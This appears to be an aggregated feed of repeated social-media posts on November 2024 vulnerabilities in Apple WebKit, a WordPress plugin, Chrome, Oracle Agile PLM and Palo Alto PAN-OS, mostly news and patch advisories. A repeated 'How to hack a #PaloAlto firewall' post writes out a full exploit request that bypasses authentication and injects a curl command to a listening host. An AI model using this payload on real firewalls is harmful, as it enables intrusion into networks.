##Update now! Apple confirms vulnerabilities are already being exploited
#CVE_2024_44308 #CVE_2024_44309
https://www.malwarebytes.com/blog/news/2024/11/update-now-apple-confirms-vulnerabilities-are-being-exploited
Apple exploited zero-days
CVE-2024-44308 JavaScriptCore Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
CVE-2024-44309 WebKit Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n
#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309
##Apple exploited zero-days
CVE-2024-44308 JavaScriptCore Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
CVE-2024-44309 WebKit Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n
#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309
##If you missed this yesterday, update your iPhone.This relates to CVE-2024-44308 and CVE-2024-44309.
#Apple Issues Emergency Security Update for Actively Exploited Vulnerabilities https://www.infosecurity-magazine.com/news/apple-security-update/ #cybersecurity #infosec
Apple security advisories: https://support.apple.com/en-us/100100
##Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) https://www.helpnetsecurity.com/2024/11/20/cve-2024-44309-cve-2024-44308/ #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS
##📣 EMERGENCY UPDATES 📣
Apple pushed additional updates for 2 zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1
📣 EMERGENCY UPDATES 📣
Apple pushed additional updates for 2 zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1
If you missed this yesterday, update your iPhone.This relates to CVE-2024-44308 and CVE-2024-44309.
#Apple Issues Emergency Security Update for Actively Exploited Vulnerabilities https://www.infosecurity-magazine.com/news/apple-security-update/ #cybersecurity #infosec
Apple security advisories: https://support.apple.com/en-us/100100
##Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) https://www.helpnetsecurity.com/2024/11/20/cve-2024-44309-cve-2024-44308/ #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS
##📣 EMERGENCY UPDATES 📣
Apple pushed additional updates for 2 zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1
📣 EMERGENCY UPDATES 📣
Apple pushed additional updates for 2 zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1
📣 EMERGENCY UPDATES 📣
Apple pushed updates for 2 new zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore),
🐛 CVE-2024-44309 (WebKit):
- iOS and iPadOS 17.7.2
- iOS and iPadOS 18.1.1
- macOS Sequoia 15.1.1
updated 2024-11-20T16:44:13
1 posts
1 repos
Today I am publishing the technical details of CVE-2024-44625, an unpatched RCE vulnerability in Gogs: https://fysac.github.io/posts/2024/11/unpatched-remote-code-execution-in-gogs/
##updated 2024-11-20T15:30:50
3 posts
1 repos
4,000,000 WordPress Sites Using Really Simple Security Free and Pro Versions Affected by Critical Authentication Bypass Vulnerability
#CVE_2024_10924
https://www.wordfence.com/blog/2024/11/really-simple-security-vulnerability/
БІЛЬШЕ 4 МІЛЬЙОНІВ САЙТІВ WORDPRESS ПІД ЗАГРОЗОЮ
Більше 4 мільйонів сайтів на базі CMS WordPress є під загрозою через критичну вразливість, виявлену спеціалістами Wordfence Security у відомому плагіні Really Simple SSL та його PRO версії.
Це одна з найбільш серйозних вразливостей в плагінах WordPress за останні 12 років!
Загроза була виявлена 6 листопада 2024 року, має ідентифікатор CVE-2024-10924 та ступінь критичності 9.8 за шкалою CVSS. Уразливість дає можливість зловмиснику віддалено отримати доступ до будь-якого облікового запису Wordpress, включаючи Адміністратора, навіть коли ввімкнено функцію двофакторної автентифікації!
12-14 листопада 2024 року команда розробників Really Simple SSL випустила пропатчену версію обох плагінів 9.1.2, у якій вразливість була повністю усунена.
Технічний аналіз цієї вразливості опублікований на сайті Wordfence:
https://www.wordfence.com/blog/2024/11/really-simple-security-vulnerability/
Висновки:
- Намагайтесь використовувати по мінімуму кількість додаткових плагінів на своєму сайті WordPress. Чим менше плагінів - тим менший ризик бути непомітно зламаним.
- Не використовуйте ламані, обнулені, крякнуті плагіни.
- Регулярно оновлюйте WordPress і усі його компоненти до останніх актуальних версій. Не затягуйте з цим.
- Будьте в курсі останніх новин з кібербезпеки, щоби вчасно дізнаватися про інциденти та реагувати на них.
- Проводьте резервне копіюванння сайтів, щоб була змога відновитись у разі зламу/атаки.
Якщо ви знаєте когось, хто використовує ці плагіни на своєму сайті, ми рекомендуємо поділитися з ним цією порадою, щоб забезпечити безпеку його сайту, оскільки ця вразливість становить значний ризик.
Кому потрібна допомога - звертайтеся, ми до ваших послуг: https://kr-labs.com.ua/blog/wordpress-security-recommendations/
#wordpress #vulnerability #cybernews #cybercrine #hacked #кібербезпека #новини #cybersecurity #ReallySimpleSSL #ReallySimpleSecurity #CVE_2024_10924 #infosec #hack
##БІЛЬШЕ 4 МІЛЬЙОНІВ САЙТІВ WORDPRESS ПІД ЗАГРОЗОЮ
Більше 4 мільйонів сайтів на базі CMS WordPress є під загрозою через критичну вразливість, виявлену спеціалістами Wordfence Security у відомому плагіні Really Simple SSL та його PRO версії.
Це одна з найбільш серйозних вразливостей в плагінах WordPress за останні 12 років!
Загроза була виявлена 6 листопада 2024 року, має ідентифікатор CVE-2024-10924 та ступінь критичності 9.8 за шкалою CVSS. Уразливість дає можливість зловмиснику віддалено отримати доступ до будь-якого облікового запису Wordpress, включаючи Адміністратора, навіть коли ввімкнено функцію двофакторної автентифікації!
12-14 листопада 2024 року команда розробників Really Simple SSL випустила пропатчену версію обох плагінів 9.1.2, у якій вразливість була повністю усунена.
Технічний аналіз цієї вразливості опублікований на сайті Wordfence:
https://www.wordfence.com/blog/2024/11/really-simple-security-vulnerability/
Висновки:
- Намагайтесь використовувати по мінімуму кількість додаткових плагінів на своєму сайті WordPress. Чим менше плагінів - тим менший ризик бути непомітно зламаним.
- Не використовуйте ламані, обнулені, крякнуті плагіни.
- Регулярно оновлюйте WordPress і усі його компоненти до останніх актуальних версій. Не затягуйте з цим.
- Будьте в курсі останніх новин з кібербезпеки, щоби вчасно дізнаватися про інциденти та реагувати на них.
- Проводьте резервне копіюванння сайтів, щоб була змога відновитись у разі зламу/атаки.
Якщо ви знаєте когось, хто використовує ці плагіни на своєму сайті, ми рекомендуємо поділитися з ним цією порадою, щоб забезпечити безпеку його сайту, оскільки ця вразливість становить значний ризик.
Кому потрібна допомога - звертайтеся, ми до ваших послуг: https://kr-labs.com.ua/blog/wordpress-security-recommendations/
#wordpress #vulnerability #cybernews #cybercrine #hacked #кібербезпека #новини #cybersecurity #ReallySimpleSSL #ReallySimpleSecurity #CVE_2024_10924 #infosec #hack
##updated 2024-11-20T00:32:20
27 posts
iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
https://www.apfeltalk.de/magazin/feature/ios-18-1-1-und-macos-sequoia-15-1-1-schliessen-aktiv-ausgenutzte-sicherheitsluecken/
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit
Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
https://www.apfeltalk.de/magazin/feature/ios-18-1-1-und-macos-sequoia-15-1-1-schliessen-aktiv-ausgenutzte-sicherheitsluecken/
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit
Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##Update now! Apple confirms vulnerabilities are already being exploited
#CVE_2024_44308 #CVE_2024_44309
https://www.malwarebytes.com/blog/news/2024/11/update-now-apple-confirms-vulnerabilities-are-being-exploited
Apple exploited zero-days
CVE-2024-44308 JavaScriptCore Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
CVE-2024-44309 WebKit Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n
#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309
##Apple exploited zero-days
CVE-2024-44308 JavaScriptCore Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
CVE-2024-44309 WebKit Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n
#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309
##iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
https://www.apfeltalk.de/magazin/feature/ios-18-1-1-und-macos-sequoia-15-1-1-schliessen-aktiv-ausgenutzte-sicherheitsluecken/
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit
Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
https://www.apfeltalk.de/magazin/feature/ios-18-1-1-und-macos-sequoia-15-1-1-schliessen-aktiv-ausgenutzte-sicherheitsluecken/
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit
Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple
##Update now! Apple confirms vulnerabilities are already being exploited
#CVE_2024_44308 #CVE_2024_44309
https://www.malwarebytes.com/blog/news/2024/11/update-now-apple-confirms-vulnerabilities-are-being-exploited
Apple exploited zero-days
CVE-2024-44308 JavaScriptCore Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
CVE-2024-44309 WebKit Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n
#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309
##Apple exploited zero-days
CVE-2024-44308 JavaScriptCore Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
CVE-2024-44309 WebKit Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n
#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309
##If you missed this yesterday, update your iPhone.This relates to CVE-2024-44308 and CVE-2024-44309.
#Apple Issues Emergency Security Update for Actively Exploited Vulnerabilities https://www.infosecurity-magazine.com/news/apple-security-update/ #cybersecurity #infosec
Apple security advisories: https://support.apple.com/en-us/100100
##Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) https://www.helpnetsecurity.com/2024/11/20/cve-2024-44309-cve-2024-44308/ #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS
##📣 EMERGENCY UPDATES 📣
Apple pushed additional updates for 2 zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1
📣 EMERGENCY UPDATES 📣
Apple pushed additional updates for 2 zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1
If you missed this yesterday, update your iPhone.This relates to CVE-2024-44308 and CVE-2024-44309.
#Apple Issues Emergency Security Update for Actively Exploited Vulnerabilities https://www.infosecurity-magazine.com/news/apple-security-update/ #cybersecurity #infosec
Apple security advisories: https://support.apple.com/en-us/100100
##Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) https://www.helpnetsecurity.com/2024/11/20/cve-2024-44309-cve-2024-44308/ #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS
##📣 EMERGENCY UPDATES 📣
Apple pushed additional updates for 2 zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1
📣 EMERGENCY UPDATES 📣
Apple pushed additional updates for 2 zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1
📣 EMERGENCY UPDATES 📣
Apple pushed updates for 2 new zero-days that may have been actively exploited.
🐛 CVE-2024-44308 (JavaScriptCore),
🐛 CVE-2024-44309 (WebKit):
- iOS and iPadOS 17.7.2
- iOS and iPadOS 18.1.1
- macOS Sequoia 15.1.1
updated 2024-11-20T00:32:14
5 posts
1 repos
Google Chrome security advisory: Stable Channel Update for Desktop
New Chrome version 131.0.6778.85/.86 for Windows, Mac and 131.0.6778.85 for Linux includes 3 security fixes, 1 externally reported: CVE-2024-11395 (high severity) Type Confusion in V8. No mention of exploitation.
#Google #Chrome #chromium #vulnerability #CVE #CVE_2024_11395
##Google Chrome security advisory: Stable Channel Update for Desktop
New Chrome version 131.0.6778.85/.86 for Windows, Mac and 131.0.6778.85 for Linux includes 3 security fixes, 1 externally reported: CVE-2024-11395 (high severity) Type Confusion in V8. No mention of exploitation.
#Google #Chrome #chromium #vulnerability #CVE #CVE_2024_11395
##Google Chrome security advisory: Stable Channel Update for Desktop
New Chrome version 131.0.6778.85/.86 for Windows, Mac and 131.0.6778.85 for Linux includes 3 security fixes, 1 externally reported: CVE-2024-11395 (high severity) Type Confusion in V8. No mention of exploitation.
#Google #Chrome #chromium #vulnerability #CVE #CVE_2024_11395
##Google Chrome security advisory: Stable Channel Update for Desktop
New Chrome version 131.0.6778.85/.86 for Windows, Mac and 131.0.6778.85 for Linux includes 3 security fixes, 1 externally reported: CVE-2024-11395 (high severity) Type Confusion in V8. No mention of exploitation.
#Google #Chrome #chromium #vulnerability #CVE #CVE_2024_11395
##CVE-2024-11395
Type Confusion in V8 in Google Chrome prior to 131.0.6778.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
If you are security cautious might want to avoid using Chrome till this is fixed, if I understood it correctly. Feel free to correct me, I will be trying to build a PoC... in my lab
I just like saying '..in my lab'
##updated 2024-11-19T20:25:31
4 posts
CVE Alert: CVE-2024-0793 - https://www.redpacketsecurity.com/cve_alert_cve-2024-0793/
##CVE Alert: CVE-2024-0793 - https://www.redpacketsecurity.com/cve_alert_cve-2024-0793/
##CVE Alert: CVE-2024-0793 - https://www.redpacketsecurity.com/cve_alert_cve-2024-0793/
##CVE Alert: CVE-2024-0793 - https://www.redpacketsecurity.com/cve_alert_cve-2024-0793/
##updated 2024-11-19T20:01:04.877000
1 posts
Some fairly interesting stuff for this #PatchTuesday!
Of particular note for me, a 9.9 in Azure CycleCloud (CVE-2024-43602), a Windows AppContainer escape (CVE-2024-49039), and a RCE in .NET/Visual Studio (CVE-2024-43498)? That one needs more detail.
https://www.zerodayinitiative.com/blog/2024/11/12/the-november-2024-security-update-review
##updated 2024-11-19T18:31:00
7 posts
1 repos
Oracle exploited zero-day: Security Alert CVE-2024-21287 Released
It was reported as being actively exploited "in the wild" by CrowdStrike.
Oracle's actual security advisory Oracle Security Alert Advisory - CVE-2024-21287 is useless because it doesn't mention exploitation.
h/t: @lawrenceabrams See Bleeping Computer reporting: Oracle warns of Agile PLM file disclosure flaw exploited in attacks
cc: @campuscodi @mttaggart @cR0w @ntkramer @iagox86 @dreadpir8robots @catc0n @harrysintonen @neurovagrant etc.
#oracle #agile #oracleagileplm #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_21287
##Oracle exploited zero-day: Security Alert CVE-2024-21287 Released
It was reported as being actively exploited "in the wild" by CrowdStrike.
Oracle's actual security advisory Oracle Security Alert Advisory - CVE-2024-21287 is useless because it doesn't mention exploitation.
h/t: @lawrenceabrams See Bleeping Computer reporting: Oracle warns of Agile PLM file disclosure flaw exploited in attacks
cc: @campuscodi @mttaggart @cR0w @ntkramer @iagox86 @dreadpir8robots @catc0n @harrysintonen @neurovagrant etc.
#oracle #agile #oracleagileplm #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_21287
##Tracked as CVE-2024-21287 (CVSS score of 7.5), the zero-day affects Agile PLM version 9.3.6 and can be exploited remotely without authentication. https://www.securityweek.com/oracle-patches-exploited-agile-plm-zero-day/
##Oracle warns of Agile PLM file disclosure flaw exploited in attacks
Oracle has fixed an unauthenticated file disclosure flaw in Oracle Agile Product Lifecycle Management (PLM) tracked as CVE-2024-21287, which was...
🔗️ [Bleepingcomputer] https://link.is.it/7jwrwy
##Tracked as CVE-2024-21287 (CVSS score of 7.5), the zero-day affects Agile PLM version 9.3.6 and can be exploited remotely without authentication. https://www.securityweek.com/oracle-patches-exploited-agile-plm-zero-day/
##Oracle warns of Agile PLM file disclosure flaw exploited in attacks
Oracle has fixed an unauthenticated file disclosure flaw in Oracle Agile Product Lifecycle Management (PLM) tracked as CVE-2024-21287, which was...
🔗️ [Bleepingcomputer] https://link.is.it/7jwrwy
##Oracle patches exploited Agile PLM vulnerability (CVE-2024-21287) https://www.helpnetsecurity.com/2024/11/19/cve-2024-21287/ #productdevelopment #CrowdStrike #enterprise #Don'tmiss #Hotstuff #Tenable #Oracle #News
##updated 2024-11-19T18:30:58
4 posts
CVE Alert: CVE-2024-52867 - https://www.redpacketsecurity.com/cve_alert_cve-2024-52867/
##CVE Alert: CVE-2024-52867 - https://www.redpacketsecurity.com/cve_alert_cve-2024-52867/
##CVE Alert: CVE-2024-52867 - https://www.redpacketsecurity.com/cve_alert_cve-2024-52867/
##CVE Alert: CVE-2024-52867 - https://www.redpacketsecurity.com/cve_alert_cve-2024-52867/
##updated 2024-11-19T17:17:29.723000
57 posts
1 repos
How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
##Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited https://thecyberexpress.com/palo-alto-pan-os-two-bugs-under-exploitation/ #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS
##How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
##Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited https://thecyberexpress.com/palo-alto-pan-os-two-bugs-under-exploitation/ #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS
##watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.
#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
#CVE_2024_0012 #CVE_2024_9474
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.
h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares
#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC
##Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474
Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
New Indicators of compromise at Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC
##watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.
#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity
##CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.
h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares
#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC
##Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474
Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
New Indicators of compromise at Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC
##How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
